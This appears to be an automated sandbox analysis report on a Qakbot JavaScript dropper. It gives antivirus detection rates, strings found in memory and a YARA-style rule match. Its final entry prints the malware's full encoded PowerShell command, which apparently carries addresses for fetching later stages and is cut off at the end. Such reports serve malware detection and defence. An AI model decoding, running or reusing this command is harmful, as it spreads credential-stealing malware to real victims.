Source: Semischolastica.js |
Avira: detected |
Source: Semischolastica.js |
ReversingLabs: Detection: 13% |
Source: Semischolastica.js |
Virustotal: Detection: 30% |
Perma Link |
Source: C:\ProgramData\WeigelasScribbleable.js |
Avira: detection malicious, Label: JS/Qakbot.G |
Source: |
Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs089 source: powershell.exe, 00000003.00000002.965250834.0000021D7D1A0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.pdbGM= source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.pdbY source: powershell.exe, 00000003.00000002.964639964.0000021D7CFA0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7CFBA000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.942982234.0000021D64FA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: wscript.exe, 00000000.00000003.576624721.000001CC97AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.576968524.000001CC99F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579865423.000001CC99B10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579593243.000001CC99A00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592556553.0000017FB91B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592773841.0000017FB92B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.590632857.0000017FB96B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.582806752.0000017FB72FD000.00000004.00000020.00020000.00000000.sdmp, Semischolastica.js, WeigelasScribbleable.js.0.dr |
String found in binary or memory: https://github.com/imaya/zlib.js |
Source: powershell.exe, 00000003.00000002.942982234.0000021D66B29000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: Process Memory Space: powershell.exe PID: 6908, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBI |